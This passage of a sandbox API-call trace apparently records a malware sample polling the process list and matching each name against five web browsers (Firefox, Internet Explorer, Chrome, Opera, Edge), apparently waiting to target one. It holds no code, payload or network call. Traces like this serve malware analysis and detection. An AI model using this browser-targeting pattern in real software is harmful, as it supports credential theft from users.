th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0214.591] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0214.591] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0214.591] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0214.591] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0214.591] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.591] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0214.591] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0214.591] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0214.591] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0214.591] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0214.591] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.591] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0214.592] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0214.592] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0214.592] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0214.592] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0214.592] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.592] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0214.592] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0214.592] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0214.592] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0214.592] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0214.592] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.592] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0214.593] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0214.593] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0214.593] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0214.593] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0214.593] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0214.593] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0214.593] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0214.594] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0214.594] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0214.594] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0214.594] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.594] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0214.594] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0214.594] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0214.594] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0214.594] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0214.594] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.594] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0214.595] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0214.595] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0214.595] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0214.595] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0214.595] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.595] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0214.595] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0214.595] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0214.595] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0214.595] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0214.595] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.595] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0214.596] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0214.596] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0214.596] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0214.596] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0214.596] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.596] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0214.597] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0214.597] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0214.597] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0214.597] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0214.597] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0214.597] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0214.597] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0214.597] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0214.597] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0214.597] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0214.597] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0214.597] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0214.598] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0214.598] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0214.598] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0214.598] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0214.598] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0214.598] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0214.598] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0214.598] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0214.598] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0214.598] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0214.598] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.598] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0214.599] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0214.599] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0214.599] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0214.599] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0214.599] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0214.599] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0214.599] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0214.599] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0214.600] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0214.600] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0214.600] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.600] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0214.600] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0214.600] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0214.600] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0214.600] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0214.600] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.600] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.601] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0214.601] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0214.601] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0214.601] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0214.601] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.601] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0214.601] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0214.601] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0214.601] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0214.601] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0214.601] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.601] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.602] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0214.602] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0214.602] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0214.602] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0214.602] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.602] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0214.603] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0214.603] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0214.603] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0214.603] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0214.603] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.603] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0214.603] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0214.603] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0214.603] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0214.603] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0214.603] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0214.603] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0214.604] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0214.604] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0214.604] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0214.604] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0214.604] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.604] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0214.604] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0214.604] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0214.604] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0214.604] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0214.604] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0214.604] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0214.605] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0214.605] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0214.605] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0214.605] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0214.605] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0214.605] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0214.605] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0214.605] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0214.606] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0214.606] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0214.606] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0214.606] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0214.606] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0214.606] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0214.606] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0214.606] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0214.606] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0214.606] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0214.674] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0214.674] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0214.674] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0214.674] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0214.674] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0214.674] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0214.675] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0214.675] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0214.675] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0214.675] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0214.675] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0214.675] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0214.675] CloseHandle (hObject=0xe8) returned 1 [0214.675] Sleep (dwMilliseconds=0x3e8) [0215.710] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0215.713] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.713] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0215.713] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0215.713] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0215.713] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0215.713] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0215.713] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0215.714] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0215.714] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0215.714] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0215.714] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0215.714] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0215.714] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0215.714] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0215.714] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0215.714] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0215.714] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0215.714] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.714] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.715] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0215.715] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0215.715] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0215.715] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0215.715] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.715] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0215.716] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0215.716] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0215.716] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0215.716] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0215.716] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.716] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.716] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0215.716] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0215.716] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0215.716] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0215.716] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0215.716] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0215.717] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0215.717] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0215.717] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0215.717] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0215.717] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0215.717] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, 